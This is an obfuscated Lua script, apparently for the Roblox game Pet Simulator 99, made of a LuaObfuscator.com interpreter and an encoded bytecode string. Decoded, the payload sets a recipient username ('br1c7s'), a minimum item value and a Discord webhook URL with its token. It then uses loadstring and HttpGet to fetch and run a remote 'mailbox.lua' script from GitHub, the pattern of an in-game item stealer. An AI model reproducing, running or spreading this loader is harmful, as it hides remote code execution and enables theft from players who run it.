--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.2) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v84=0;while true do if (v84==0) then v19=v0(v3(v30,1,1));return "";end end else local v85=v2(v0(v30,16));if v19 then local v92=v5(v85,v19);v19=nil;return v92;else return v85;end end end);local function v20(v31,v32,v33) if v33 then local v86=(v31/(((882 -(282 + 595)) -3)^(v32-1)))%(((1642 -(1523 + 114)) -3)^(((v33-1) -(v32-((1 + 0) -0))) + (2 -1))) ;return v86-(v86%1) ;else local v87=619 -(555 + 64) ;local v88;while true do if (v87==(931 -(857 + 74))) then v88=(570 -(367 + 201))^(v32-((1322 -394) -(214 + 713))) ;return (((v31%(v88 + v88))>=v88) and (1 + 0)) or ((1065 -(68 + 997)) + 0) ;end end end end local function v21() local v34=1270 -(226 + 1044) ;local v35;while true do if (v34==(4 -3)) then return v35;end if (v34==(117 -(32 + 85))) then v35=v1(v16,v18,v18);v18=v18 + 1 + 0 + 0 ;v34=1;end end end local function v22() local v36=957 -(892 + 65) ;local v37;local v38;while true do if (v36==(2 -1)) then return (v38 * 256) + v37 ;end if (v36==(0 -0)) then v37,v38=v1(v16,v18,v18 + (3 -1) );v18=v18 + (352 -(87 + 263)) ;v36=181 -(50 + 17 + (277 -164)) ;end end end local function v23() local v39=0 + 0 ;local v40;local v41;local v42;local v43;while true do if (v39==(3 -2)) then return (v43 * 16777216) + (v42 * (66488 -(802 + 150))) + (v41 * 256) + v40 ;end if (v39==(0 -0)) then v40,v41,v42,v43=v1(v16,v18,v18 + (5 -2) );v18=v18 + 3 + (998 -(915 + 82)) ;v39=1;end end end local function v24() local v44=(0 -0) -0 ;local v45;local v46;local v47;local v48;local v49;local v50;while true do if (v44==(2 + 1)) then if (v49==(0 -0)) then if (v48==(1187 -(1069 + 118))) then return v50 * 0 ;else v49=2 -1 ;v47=0 -0 ;end elseif (v49==(356 + 1691)) then return ((v48==(0 -(0 + 0))) and (v50 * ((1 + 0)/(0 -(0 + 0))))) or (v50 * NaN) ;end return v8(v50,v49-(56 + 967) ) * (v47 + (v48/(((1848 -(87 + 968)) -(368 + 423))^(163 -111)))) ;end if (v44==((83 -64) -(10 + 8))) then v47=3 -2 ;v48=(v20(v46,1081 -(1020 + 60) ,1443 -(630 + 793) ) * ((444 -(416 + 26))^(102 -70))) + v45 ;v44=1 + 1 ;end if ((0 -0)==v44) then v45=v23();v46=v23();v44=439 -(145 + 293) ;end if (((392 + 40) -(44 + 386))==v44) then v49=v20(v46,21,1778 -(760 + 987) );v50=((v20(v46,1945 -(1789 + 124) )==(1487 -(998 + 488))) and  -(767 -(745 + 21))) or (1 + (0 -0)) ;v44=3 + 0 ;end end end local function v25(v51) local v52=0;local v53;local v54;while true do if (v52==(1415 -((1700 -1253) + 797 + 169))) then v54={};for v93=(378 -(85 + 291)) -1 , #v53 do v54[v93]=v2(v1(v3(v53,v93,v93)));end v52=1820 -(1703 + 114) ;end if (((572 + 130) -(376 + 325))==v52) then v53=v3(v16,v18,(v18 + v51) -1 );v18=v18 + v51 ;v52=2 -0 ;end if (((1265 -(243 + 1022)) -0)==v52) then v53=nil;if  not v51 then local v99=0 + 0 ;while true do if (v99==0) then v51=v23();if (v51==(0 -0)) then return "";end break;end end end v52=1;end if (v52==(17 -(9 + 5))) then return v6(v54);end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v55=0 + 0 ;local v56;local v57;local v58;local v59;local v60;local v61;while true do local v68=0 -0 ;local v69;while true do if (0~=v68) then else v69=0 + 0 ;while true do if (v69~=(1 -0)) then else if (v55~=3) then else for v108=1,v23() do v57[v108-(1385 -(746 + 638)) ]=v28();end return v59;end if (v55~=(1 + 0)) then else local v106=0 -0 ;while true do if (v106~=1) then else v61={};v55=343 -(218 + 123) ;break;end if (v106~=(1581 -(1535 + 46))) then else v59={v56,v57,nil,v58};v60=v23();v106=561 -(306 + 254) ;end end end break;end if (v69==(1551 -(1126 + 425))) then if ((405 -(118 + 287))==v55) then v56={};v57={};v58={};v55=1;end if (v55==(1 + 1)) then for v110=3 -2 ,v60 do local v111=0 -0 ;local v112;local v113;local v114;local v115;while true do if (v111==(1469 -(899 + 568))) then while true do if (v112~=(1 + 0)) then else v115=nil;while true do if (v113~=(1122 -(118 + 1003))) then else if (v114==(2 -1)) then v115=v21()~=(377 -(142 + 235)) ;elseif (v114==(605 -(268 + 335))) then v115=v24();elseif (v114==(293 -(60 + 230))) then v115=v25();end v61[v110]=v115;break;end if (v113~=0) then else local v166=572 -(426 + 146) ;while true do if (v166~=1) then else v113=1 + 0 ;break;end if (v166~=(1456 -(282 + 1174))) then else v114=v21();v115=nil;v166=978 -(553 + 424) ;end end end end break;end if (v112==(811 -(569 + 242))) then v113=0 -0 ;v114=nil;v112=1 + 0 ;end end break;end if (v111~=(1 + 0)) then else v114=nil;v115=nil;v111=2;end if (v111~=(1024 -(706 + 318))) then else v112=0 + 0 ;v113=nil;v111=1 + 0 ;end end end v59[6 -3 ]=v21();for v116=1,v23() do local v117=1251 -(721 + 530) ;local v118;local v119;while true do if ((0 -0)~=v117) then else v118=1271 -(945 + 326) ;v119=nil;v117=2 -1 ;end if (v117~=1) then else while true do if (v118~=(0 -0)) then else v119=v21();if (v20(v119,1 + 0 ,1 + 0 )==0) then local v159=700 -(271 + 429) ;local v160;local v161;local v162;local v163;local v164;while true do if (v159~=(0 + 0)) then else v160=1500 -(1408 + 92) ;v161=nil;v159=754 -(239 + 514) ;end if (v159~=(1 + 1)) then else v164=nil;while true do if (v160~=(1329 -(797 + 532))) then else v161=1086 -(461 + 625) ;v162=nil;v160=1289 -(993 + 295) ;end if ((1 + 1)~=v160) then else while true do if (v161==(1203 -(373 + 829))) then local v169=0;while true do if (v169==1) then v161=2;break;end if ((731 -(476 + 255))~=v169) then else local v177=1171 -(418 + 753) ;while true do if (v177==(0 + 0)) then v164={v22(),v22(),nil,nil};if (v162==(0 + 0)) then local v180=0 -0 ;local v181;local v182;while true do if ((0 + 0)~=v180) then else v181=336 -(144 + 192) ;v182=nil;v180=1 + 0 ;end if (v180~=1) then else while true do if (v181==(216 -(42 + 174))) then v182=0 + 0 ;while true do if (v182==0) then v164[1 + 2 ]=v22();v164[533 -(406 + 123) ]=v22();break;end end break;end end break;end end elseif (v162==(1770 -(1749 + 20))) then v164[3]=v23();elseif (v162==(1 + 1)) then v164[1507 -(363 + 1141) ]=v23() -((1 + 1)^(1338 -(1249 + 73))) ;elseif (v162==(8 -5)) then local v186=0 + 0 ;local v187;local v188;while true do if (v186==(1146 -(466 + 679))) then while true do if (v187==(0 + 0)) then v188=0 -0 ;while true do if (v188==0) then v164[8 -5 ]=v23() -(2^16) ;v164[1904 -(106 + 1794) ]=v22();break;end end break;end end break;end if (v186==(0 + 0)) then v187=0 + 0 ;v188=nil;v186=1934 -(565 + 1368) ;end end end v177=2 -1 ;end if ((1662 -(1477 + 184))==v177) then v169=2 -1 ;break;end end end end end if (v161==0) then local v170=0;local v171;while true do if (v170==0) then v171=114 -(4 + 110) ;while true do if (1~=v171) then else v161=585 -(57 + 527) ;break;end if ((1427 -(41 + 1386))==v171) then v162=v20(v119,858 -(564 + 292) ,3);v163=v20(v119,107 -(17 + 86) ,6);v171=1 -0 ;end end break;end end end if (v161==3) then if (v20(v163,3 + 0 ,6 -3 )~=(1 + 0)) then else v164[11 -7 ]=v61[v164[170 -(122 + 44) ]];end v56[v116]=v164;break;end if (v161~=(1003 -(938 + 63))) then else local v173=0 -0 ;local v174;while true do if (v173~=(1125 -(936 + 189))) then else v174=0 + 0 ;while true do if ((0 -0)==v174) then local v178=0 + 0 ;local v179;while true do if (v178~=(0 + 0)) then else v179=0 + 0 ;while true do if (v179==(0 -0)) then local v185=0;while true do if (v185~=(2 -1)) then else v179=1;break;end if (v185==0) then if (v20(v163,1 -0 ,1093 -(975 + 117) )~=(66 -(30 + 35))) then else v164[2 + 0 ]=v61[v164[1259 -(1043 + 214) ]];end if (v20(v163,7 -5 ,6 -4 )~=(1213 -(323 + 889))) then else v164[7 -4 ]=v61[v164[583 -(361 + 219) ]];end v185=1 -0 ;end end end if ((321 -(53 + 267))~=v179) then else v174=1 + 0 ;break;end end break;end end end if (v174==(414 -(15 + 398))) then v161=985 -(18 + 964) ;break;end end break;end end end end break;end if (v160~=(3 -2)) then else local v167=0;local v168;while true do if (v167~=0) then else v168=0 + 0 ;while true do if (v168~=(0 -0)) then else v163=nil;v164=nil;v168=2 -1 ;end if (v168~=1) then else v160=2;break;end end break;end end end end break;end if (v159~=(1228 -(322 + 905))) then else v162=nil;v163=nil;v159=2 + 0 ;end end end break;end end break;end end end v55=2 + 1 ;end v69=851 -(20 + 830) ;end end break;end end end end local function v29(v62,v63,v64) local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...) local v70=v65;local v71=v66;local v72=v67;local v73=v27;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v89=0,v78 do if (v89>=v72) then v76[v89-v72 ]=v77[v89 + 1 ];else v80[v89]=v77[v89 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do v82=v70[v74];v83=v82[1];if (v83<=5) then if (v83<=2) then if (v83<=0) then do return;end elseif (v83>1) then v64[v82[3]]=v80[v82[2]];else v80[v82[2]]=v82[3];end elseif (v83<=3) then v74=v82[3];elseif (v83>4) then local v124=v82[2];v80[v124]=v80[v124](v13(v80,v124 + 1 ,v75));else local v126;local v127,v128;local v129;local v130;v64[v82[3]]=v80[v82[2]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v64[v82[3]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v64[v82[3]];v74=v74 + 1 ;v82=v70[v74];v130=v82[2];v129=v80[v82[3]];v80[v130 + 1 ]=v129;v80[v130]=v129[v82[4]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v130=v82[2];v127,v128=v73(v80[v130](v13(v80,v130 + 1 ,v82[3])));v75=(v128 + v130) -1 ;v126=0;for v152=v130,v75 do v126=v126 + 1 ;v80[v152]=v127[v126];end v74=v74 + 1 ;v82=v70[v74];v130=v82[2];v80[v130]=v80[v130](v13(v80,v130 + 1 ,v75));v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]();v74=v74 + 1 ;v82=v70[v74];v74=v82[3];end elseif (v83<=8) then if (v83<=6) then if (v80[v82[2]]==v82[4]) then v74=v74 + 1 ;else v74=v82[3];end elseif (v83==7) then v80[v82[2]]=v64[v82[3]];else v64[v82[3]]=v80[v82[2]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v64[v82[3]]=v80[v82[2]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v74=v82[3];end elseif (v83<=9) then local v101=0;local v102;local v103;local v104;local v105;while true do if (v101==0) then v102=v82[2];v103,v104=v73(v80[v102](v13(v80,v102 + 1 ,v82[3])));v101=1;end if (v101==2) then for v156=v102,v75 do v105=v105 + 1 ;v80[v156]=v103[v105];end break;end if (v101==1) then v75=(v104 + v102) -1 ;v105=0;v101=2;end end elseif (v83==10) then v80[v82[2]]();else local v147=v82[2];local v148=v80[v82[3]];v80[v147 + 1 ]=v148;v80[v147]=v148[v82[4]];end v74=v74 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F03063O004D696E524150025O006AF840030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403423O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4861726447616D6553732F50532O392F6D61696E2F6D61696C626F782E6C756103083O00557365724E616D6503063O0062723163377303073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313231343833343234323536383332333130322F756F4D4A4161386630374F43336137326F737243754E5A73346E305157302O5661566F5667583631574E6F534563582D47684D6F3554457349792O65333565304D42757400163O0012013O00013O0026063O000D000100020004033O000D0001001201000100043O001204000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000200046O00013O00024O00010001000100044O001500010026063O0001000100010004033O000100010012010001000A3O001208000100093O00122O0001000C3O00122O0001000B3O00124O00023O00044O000100016O00017O00",v9(),...);
